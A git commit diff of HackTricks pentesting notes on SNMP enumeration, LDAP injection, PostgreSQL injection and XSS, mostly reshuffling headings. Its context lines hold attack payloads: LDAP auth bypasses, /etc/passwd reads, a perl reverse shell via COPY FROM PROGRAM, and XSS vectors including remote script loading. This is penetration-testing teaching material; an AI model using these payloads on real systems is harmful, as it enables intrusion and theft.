This commit is contained in:
carlospolop 2022-05-01 17:51:38 +01:00
parent 4329056431
commit bc9f085551
5 changed files with 109 additions and 111 deletions

1
.gitignore vendored Normal file
View File

@ -0,0 +1 @@
.dccache

View File

@ -24,9 +24,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## 161,162,10161,10162/udp - Pentesting SNMP
### S**NMP - Explained**
# SNMP - Explained
**SNMP - Simple Network Management Protocol** is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
@ -35,12 +34,12 @@ PORT STATE SERVICE REASON VERSION
161/udp open snmp udp-response ttl 244 ciscoSystems SNMPv3 server (public)
```
#### MIB
## MIB
**MIB** stands for **M**anagement **I**nformation **B**ase and is a **collection of information organized hierarchically**. These are **accessed using** a protocol such as **SNMP**. There are two types of MIBs: **scalar** and **tabular**.\
Scalar objects define a single object instance whereas tabular objects define multiple related object instances grouped in MIB tables.
#### OIDs
## OIDs
**OIDs** stands for **O**bject **Id**entifiers. **OIDs uniquely identify managed objects in a MIB hierarchy**. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs (OIDs) belong to different standard organizations.\
**Vendors define private branches including managed objects for their own products.**
@ -50,7 +49,7 @@ Scalar objects define a single object instance whereas tabular objects define mu
You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\
There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the **OIDs pending from this one** you can obtain some interesting host data (system data, network data, processes data...)
#### **OID Example**
## **OID Example**
**`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7`**
@ -83,14 +82,14 @@ The rest of the values give specific information about the device.
_**(Example take from**_ [_**here**_](https://www.netadmintools.com/snmp-mib-and-oids)_**)**_
#### SNMP Versions
## SNMP Versions
There are 2 important versions of SNMP:
* **SNMPv1**: Main one, it is still the most frequent, the **authentication is based on a string** (community string) that travels in **plain-text** (all the information travels in plain text). **Version 2 and 2c** send the **traffic in plain text** also and uses a **community string as authentication**.
* **SNMPv3**: Uses a better authentication form and the information travels **encrypted** using (**dictionary attack** could be performed but would be much harder to find the correct creds that inn SNMPv1 and v2).
#### Community Strings
## Community Strings
As mentioned before, **in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.**\
The are **2 types of community strings**:
@ -103,17 +102,17 @@ If you try to **write** an object a **`noSuchName` or `readOnly` error** is rece
In versions 1 and 2/2c if you to use a **bad** community string the server wont **respond**. So, if it responds, a **valid community strings was used**.
### Ports
# Ports
* The SNMP agent receives requests on UDP port **161**.
* The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#InformRequest)) on port **162**.
* When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport\_Layer\_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram\_Transport\_Layer\_Security), requests are received on port **10161** and notifications are sent to port **10162**.
### Brute-Force Community String (v1 and v2c)
# Brute-Force Community String (v1 and v2c)
To **guess the community string** you could perform a dictionary attack. Check [here different ways to perform a brute-force attack against SNMP](../../generic-methodologies-and-resources/brute-force.md#snmp).
### Enumerating SNMP
# Enumerating SNMP
It is recommanded to install the following to see whats does mean **each OID gathered** from the device:
@ -141,7 +140,7 @@ snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** (IPv4 and **IPv6** address), Usernames, Uptime, Server/OS version, and **processes running** (may contain passwords)....
### From SNMP to RCE
# From SNMP to RCE
If you have the **string** that allows you to **write values** inside the SNMP service, you may be able to abuse it to **execute commands**:
@ -149,7 +148,7 @@ If you have the **string** that allows you to **write values** inside the SNMP s
[snmp-rce.md](snmp-rce.md)
{% endcontent-ref %}
### **Massive SNMP**
# **Massive SNMP**
[Braa ](https://github.com/mteg/braa)is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.
@ -165,7 +164,7 @@ This can extract a lot MB of information that you cannot process manually.
So, lets look for the most interesting information (from [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)):
#### Devices
## Devices
One of the first things I do is extract the sysDesc .1.3.6.1.2.1.1.1.0 MIB data from each file to determine what devices I have harvested information from. This can easily be done using the following grep command:
@ -173,7 +172,7 @@ One of the first things I do is extract the sysDesc .1.3.6.1.2.1.1.1.0 MIB data
grep ".1.3.6.1.2.1.1.1.0" *.snmp
```
#### Identify private string
## Identify private string
As an example, if I can identify the private community string used by an organization on their Cisco IOS routers, then I could possibly use that community string to extract the running configurations from those routers. The best method for finding such data has often been related to SNMP Trap data. So again, using the following grep we can parse through a lot of MIB data quickly searching for the key word of “trap”:
@ -181,7 +180,7 @@ As an example, if I can identify the private community string used by an organiz
grep -i "trap" *.snmp
```
#### Usernames/passwords
## Usernames/passwords
Another area of interest is logs, I have discovered that there are some devices that hold logs within the MIB tables. These logs can also contain failed logon attempts. Think about the last time you logged into a device via Telnet or SSH and inadvertently entered your password as the username. I typically search for key words such as _fail_, _failed_ or _login_ and examine that data to see if there is anything of value.
@ -189,27 +188,27 @@ Another area of interest is logs, I have discovered that there are some devices
grep -i "login\|fail" *.snmp
```
#### Emails
## Emails
```bash
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
```
### Modifying SNMP values
# Modifying SNMP values
You can use _**NetScanTools**_ to **modify values**. You will need to know the **private string** in order to do so.
### Spoofing
# Spoofing
If there is an ACL that only allows some IPs to query the SMNP service, you can spoof one of this addresses inside the UDP packet an sniff the traffic.
### Examine SNMP Configuration files
# Examine SNMP Configuration files
* snmp.conf
* snmpd.conf
* snmp-config.xml
### HackTricks Automatic Commands
# HackTricks Automatic Commands
```
Protocol_Name: SNMP #Protocol Abbreviation if there is one.

View File

@ -24,9 +24,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## LDAP Injection
# LDAP Injection
### **LDAP**
## **LDAP**
**If you want to know what is LDAP access the following page:**
@ -74,7 +74,7 @@ Example: `(&(directory=val1)(folder=public))`
Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter (the one executed).
### Login Bypass
## Login Bypass
LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
@ -133,13 +133,13 @@ password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
#### Lists
### Lists
* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
* [LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
* [LDAP PosixAccount attributes](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)
### Blind LDAP Injection
## Blind LDAP Injection
You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
@ -155,7 +155,7 @@ Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
#### Dump data
### Dump data
You can iterate over the ascii letters, digits and symbols:
@ -170,9 +170,9 @@ You can iterate over the ascii letters, digits and symbols:
...
```
### Scripts
## Scripts
#### **Discover valid LDAP fields**
### **Discover valid LDAP fields**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).
@ -208,7 +208,7 @@ for attribute in attributes: #Extract all attributes
print()
```
#### **Special Blind LDAP Injection (without "\*")**
### **Special Blind LDAP Injection (without "\*")**
```python
#!/usr/bin/python3
@ -227,13 +227,13 @@ for i in range(50):
break
```
### Google Dorks
## Google Dorks
```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```
### More Payloads
## More Payloads
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)

View File

@ -1,4 +1,3 @@
# PostgreSQL injection
<details>
@ -26,24 +25,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
## Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration
# Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration
**`dblink`** is a **PostgreSQL module** that offers several interesting options from the attacker point of view. It can be used to **connect to other PostgreSQL instances** of perform **TCP connections**.\
**These functionalities** along with the **`COPY FROM`** functionality can be used to **escalate privileges**, perform **port scanning** or grab **NTLM challenge responses**.\
[**You can read here how to perform these attacked.**](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)
#### **Exfiltration example using dblink and large objects**
## **Exfiltration example using dblink and large objects**
You can [**read this example**](dblink-lo\_import-data-exfiltration.md) to see a CTF example of\*\* how to load data inside large objects and then exfiltrate the content of large objects inside the username\*\* of the function `dblink_connect`.
### PL/pgSQL password bruteforce
# PL/pgSQL password bruteforce
PL/pgSQL, as a **fully featured programming language**, allows much more procedural control than SQL, including the **ability to use loops and other control structures**. SQL statements and triggers can call functions created in the PL/pgSQL language.\
**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** [**Read this to learn how.**](pl-pgsql-password-bruteforce.md)
### File-system actions
# File-system actions
#### Read directories and files
## Read directories and files
From this [commit ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a)members of the `DEFAULT_ROLE_READ_SERVER_FILES` group and super users can use these methods on any path (check out `convert_and_check_filename` in `genfile.c`).:
@ -52,7 +51,7 @@ select * from pg_ls_dir('/tmp');
select * from pg_read_file('/etc/passwd' , 0 , 1000000);
```
#### Simple File Writing
## Simple File Writing
```bash
copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';
@ -61,14 +60,14 @@ copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/ju
Remember that COPY cannot handle newline chars, therefore even if you are using a base64 payload y**ou need to send a one-liner**.\
A very important limitation of this technique is that **`copy` cannot be used to write binary files as it modify some binary values.**
#### **Binary files upload**
## **Binary files upload**
However, there are **other techniques to upload big binary files**.\
[**Read this page to learn how to do it.**](big-binary-files-upload-postgresql.md)
### RCE
# RCE
#### **RCE from version 9.3**
## **RCE from version 9.3**
Since[ version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), new functionality for '[COPY TO/FROM PROGRAM](https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/)' was implemented. This allows the database superuser, and any user in the pg\_execute\_server\_program group to run arbitrary operating system commands.
@ -88,12 +87,12 @@ COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::I
Or use the `multi/postgres/postgres_copy_from_program_cmd_exec` module from **metasploit**.\
More information about this vulnerability [**here**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). While reported as CVE-2019-9193, Postges declared this was a [feature and will not be fixed](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).
#### RCE with PostgreSQL extensions
## RCE with PostgreSQL extensions
Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**.\
[**Lear how to abuse this functionality reading this post.**](rce-with-postgresql-extensions.md)
#### PostgreSQL configuration file RCE
## PostgreSQL configuration file RCE
The **configuration file** of postgresql is **writable** by the **postgres user** which is the one running the database, so as **superuser** you can write files in the filesystem, and therefore you can **overwrite this file.**
@ -121,14 +120,14 @@ While testing this I noticed that this will only work if the **private key file
**More** [**information about this technique here**](https://pulsesecurity.co.nz/articles/postgres-sqli)**.**
### WAF bypass
# WAF bypass
#### PostgreSQL String functions
## PostgreSQL String functions
Manipulating strings could help you to **bypass WAFs or other restrictions**.\
[**In this page** ](https://www.postgresqltutorial.com/postgresql-string-functions/)**you can find some useful Strings functions.**
#### Stacked Queries
## Stacked Queries
Remember that postgresql support stacked queries, but several application will throw an error if 2 responses are returned when expecting just 1. But, you can still abuse the stacked queries via Time injection:
@ -137,7 +136,7 @@ id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
```
#### XML tricks
## XML tricks
**query\_to\_xml**
@ -155,7 +154,7 @@ This function will dump the whole database in XML format in just 1 row (be caref
SELECT database_to_xml(true,true,'');
```
#### Forbidden quotes
## Forbidden quotes
If cannot use quotes for your payload you could bypass this with `CHR` for basic clauses (_character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements_):

View File

@ -24,9 +24,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## XSS (Cross Site Scripting)
### Methodology
# Methodology
1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code.
2. **Find the context** where it's reflected/used.
@ -57,7 +56,7 @@ When working on a complex XSS you might find interesting to know about:
[debugging-client-side-js.md](debugging-client-side-js.md)
{% endcontent-ref %}
### Reflected values
# Reflected values
In order to successfully exploit a XSS the first thing you need to find is a **value controlled by you that is being reflected** in the web page.
@ -65,16 +64,16 @@ In order to successfully exploit a XSS the first thing you need to find is a **v
* **Stored and reflected**: If you find that a value controlled by you is saved in the server and is reflected every time you access a page you could exploit a **Stored XSS**.
* **Accessed via JS**: If you find that a value controlled by you is being access using JS you could exploit a **DOM XSS**.
### Contexts
# Contexts
When trying to exploit a XSS the first thing you need to know if **where is your input being reflected**. Depending on the context, you will be able to execute arbitrary JS code on different ways.
#### Raw HTML
## Raw HTML
If your input is **reflected on the raw HTML** page you will need to abuse some **HTML tag** in order to execute JS code: `<img , <iframe , <svg , <script` ... these are just some of the many possible HTML tags you could use.\
Also, keep in mind [Client Side Template Injection](../client-side-template-injection-csti.md).
#### Inside HTML tags attribute
## Inside HTML tags attribute
If your input is reflected inside the value of the attribute of a tag you could try:
@ -83,7 +82,7 @@ If your input is reflected inside the value of the attribute of a tag you could
3. If you **cannot escape from the attribute** (`"` is being encoded or deleted), then depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked. Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
4. If your input is reflected inside "**unexpoitable tags**" you could try the **`accesskey`** trick to abuse the vuln (you will need some kind of social engineer to exploit this): **`" accesskey="x" onclick="alert(1)" x="`**
#### Inside JavaScript code
## Inside JavaScript code
In this case your input is reflected between **`<script> [...] </script>`** tags of a HTML page, inside a \*\*`.js`\*\*file or inside an attribute using **`javascript:`** protocol:
@ -94,7 +93,7 @@ In this case your input is reflected between **`<script> [...] </script>`** tags
* `\';alert(1)//`
* If reflected inside template literals \`\` you can **embed JS expressions** using `${ ... }` syntax: `` `var greetings = ``Hello, ${alert(1)}\`\`\`
#### DOM
## DOM
There is **JS code** that is using **unsafely** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
@ -102,7 +101,7 @@ There is **JS code** that is using **unsafely** some **data controlled by an att
[dom-xss.md](dom-xss.md)
{% endcontent-ref %}
#### **Universal XSS**
## **Universal XSS**
These kind of XSS can be found **anywhere**. They not depend just on the client exploitation of a web application but on **any** **context**. These kind of **arbitrary JavaScript execution** can even be abuse to obtain **RCE**, **read** **arbitrary** **files** in clients and servers, and more.\
Some **examples**:
@ -115,11 +114,11 @@ Some **examples**:
[xss-to-rce-electron-desktop-apps](../../network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/)
{% endcontent-ref %}
### WAF bypass encoding image
# WAF bypass encoding image
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/EauBb2EX0AERaNK.jpg)
### Injecting inside raw HTML
# Injecting inside raw HTML
When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
@ -136,11 +135,11 @@ In this case and if no black/whitelisting is used, you could use payloads like:
But, if tags/attributes black/whitelisting is being used, you will need to **brute-force which tags** you can create.\
Once you have **located which tags are allowed**, you would need to **brute-force attributes/events** inside the found valid tags to see how you can attack the context.
#### Tags/Events brute-force
## Tags/Events brute-force
Go to [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click on _**Copy tags to clipboard**_. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can **brute force all the events** using the valid tags (in the same web page click on _**Copy events to clipboard**_ and follow the same procedure as before).
#### Custom tags
## Custom tags
If you didn't find any valid HTML tag, you could try to **create a custom tag** and and execute JS code with the `onfocus` attribute. In the XSS request, you need to end the URL with `#` to make the page **focus on that object** and **execute** the code:
@ -148,7 +147,7 @@ If you didn't find any valid HTML tag, you could try to **create a custom tag**
/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
```
#### Blacklist Bypasses
## Blacklist Bypasses
If some kind of blacklist is being used you could try to bypass it with some silly tricks:
@ -202,7 +201,7 @@ onerror=alert`1`
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
```
#### Length bypass (small XSSs)
## Length bypass (small XSSs)
{% hint style="info" %}
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
@ -219,17 +218,17 @@ The last one is using 2 unicode characters which expands to 5: telsr\
More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).
#### Click XSS - Clickjacking
## Click XSS - Clickjacking
If in order to exploit the vulnerability you need the **user to click a link or a form** with prepopulated data you could try to [**abuse Clickjacking**](../clickjacking.md#xss-clickjacking) (if the page is vulnerable).
#### Impossible - Dangling Markup
## Impossible - Dangling Markup
If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection.md)because you could **exploit** the vulnerability **without** executing **JS** code.
### Injecting inside HTML tag
# Injecting inside HTML tag
#### Inside the tag/escaping from attribute value
## Inside the tag/escaping from attribute value
If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.\
If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_):
@ -251,7 +250,7 @@ If you **cannot escape from the tag**, you could create new attributes inside th
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
```
#### Within the attribute
## Within the attribute
Even if you **cannot escape from the attribute** (`"` is being encoded or deleted), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.\
Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
@ -291,7 +290,7 @@ Note that **any kind of HTML encode is valid**:
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
```
#### Special Protocols Within the attribute
## Special Protocols Within the attribute
There you can use the protocols **`javascript:`** or **`data:`** in some places to **execute arbitrary JS code**. Some will require user interaction on some won't.
@ -373,7 +372,7 @@ You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe`
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
```
#### Reverse tab nabbing
## Reverse tab nabbing
```javascript
<a target="_blank" rel="opener"
@ -385,7 +384,7 @@ If you can inject any URL in an arbitrary **`<a href=`** tag that contains the *
[reverse-tab-nabbing.md](../reverse-tab-nabbing.md)
{% endcontent-ref %}
#### on Event Handlers Bypass
## on Event Handlers Bypass
First of all check this page ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) for useful **"on" event handlers**.\
In case there is some blacklist preventing you from creating this even handlers you can try the following bypasses:
@ -405,7 +404,7 @@ Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
```
#### XSS in "Unexploitable tags" (input hidden, link, canonical)
## XSS in "Unexploitable tags" (input hidden, link, canonical)
From [here](https://portswigger.net/research/xss-in-hidden-input-fields):\
You can execute an **XSS payload inside a hidden attribute**, provided you can **persuade** the **victim** into pressing the **key combination**. On Firefox Windows/Linux the key combination is **ALT+SHIFT+X** and on OS X it is **CTRL+ALT+X**. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
@ -416,7 +415,7 @@ You can execute an **XSS payload inside a hidden attribute**, provided you can *
T**he XSS payload will be something like this: `" accesskey="x" onclick="alert(1)" x="`**
#### Blacklist Bypasses
## Blacklist Bypasses
Several tricks with using different encoding were exposed already inside this section. Go **back to learn where can you use HTML encoding, Unicode encoding, URL encoding, Hex and Octal encoding and even data encoding**.
@ -428,7 +427,7 @@ Read the[ Blacklist Bypasses of the previous section](./#blacklist-bypasses).
Read the J[avaScript bypass blacklist of the following section](./#javascript-bypass-blacklists-techniques).
#### CSS-Gadgets
## CSS-Gadgets
If you found a **XSS in a very small part** of the web that requires some kind of interaction (maybe a small link in the footer with an onmouseover element), you can try to **modify the space that element occupies** to maximize the probabilities of have the link fired.
@ -448,11 +447,11 @@ Now you can modify our link and bring it to the form
This trick was taken from [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)
### Injecting inside JavaScript code
# Injecting inside JavaScript code
In these case you **input** is going to be **reflected inside the JS code** of a `.js` file or between `<script>...</script>` tags or between HTML events that can execute JS code or between attributes that accepts the `javascript:` protocol.
#### Escaping \<script> tag
## Escaping \<script> tag
If your code is inserted within `<script> [...] var input = 'reflected data' [...] </script>` you could easily **escape closing the `<script>`** tag:
@ -462,7 +461,7 @@ If your code is inserted within `<script> [...] var input = 'reflected data' [..
Note that in this example we **haven't even closed the single quote**, but that's not necessary as the **browser first performs HTML parsing** to identify the page elements including blocks of script, and only later performs JavaScript parsing to understand and execute the embedded scripts.
#### Inside JS code
## Inside JS code
If `<>` are being sanitised you can still **escape the string** where your input is being **located** and **execute arbitrary JS**. It's important to **fix JS syntax**, because if there are any errors, the JS code won't be executed:
@ -472,14 +471,14 @@ If `<>` are being sanitised you can still **escape the string** where your input
\';alert(document.domain)//
```
#### Template literals \`\`
## Template literals \`\`
In order to construct **strings** apart from single and double quotes JS also accepts **backticks** **` `` `** . This is known as template literals as they allow to **embedded JS expressions** using `${ ... }` syntax.\
Therefore, if you find that your input is being **reflected** inside a JS string that is using backticks, you can abuse the syntax `${ ... }` to execute **arbitrary JS code**:
This can be **abused** using: `${alert(1)}`
#### Encoded code execution
## Encoded code execution
```markup
<script>\u0061lert(1)</script>
@ -488,7 +487,7 @@ This can be **abused** using: `${alert(1)}`
<iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">
```
#### JavaScript bypass blacklists techniques
## JavaScript bypass blacklists techniques
**Strings**
@ -607,7 +606,7 @@ top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>
````
### **DOM vulnerabilities**
# **DOM vulnerabilities**
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.\
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:**
@ -619,19 +618,19 @@ There is **JS code** that is using **unsafely data controlled by an attacker** l
There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.\
Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
### Other Bypasses
# Other Bypasses
#### Normalised Unicode
## Normalised Unicode
You could check is the **reflected values** are being **unicode normalized** in the server (or in the client side) and abuse this functionality to bypass protections. [**Find an example here**](../unicode-normalization-vulnerability.md#xss-cross-site-scripting).
#### PHP FILTER\_VALIDATE\_EMAIL flag Bypass
## PHP FILTER\_VALIDATE\_EMAIL flag Bypass
```javascript
"><svg/onload=confirm(1)>"@x.y
```
#### Ruby-On-Rails bypass
## Ruby-On-Rails bypass
Due to **RoR mass assignment** quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields (onfocus) can be added inside the tag.\
Form example ([from this report](https://hackerone.com/reports/709336)), if you send the payload:
@ -652,7 +651,7 @@ Then, the onfocus attribute will be inserted:
A XSS occurs.
#### Special combinations
## Special combinations
```markup
<iframe/src="data:text/html,<svg onload=alert(1)>">
@ -681,14 +680,14 @@ A XSS occurs.
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"
```
#### XSS with header injection in a 302 response
## XSS with header injection in a 302 response
If you find that you can **inject headers in a 302 Redirect response** you could try to **make the browser execute arbitrary JavaScript**. This is **not trivial** as modern browsers do not interpret the HTTP response body if the HTTP response status code is a 302, so just a cross-site scripting payload is useless.
In [**this report**](https://www.gremwell.com/firefox-xss-302) and [**this one**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) you can read how you can test several protocols inside the Location header and see if any of them allows the browser to inspect and execute the XSS payload inside the body.\
Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location header_, `resource://`.
#### Obfuscation & Advanced Bypass
## Obfuscation & Advanced Bypass
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
* [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
@ -719,15 +718,15 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
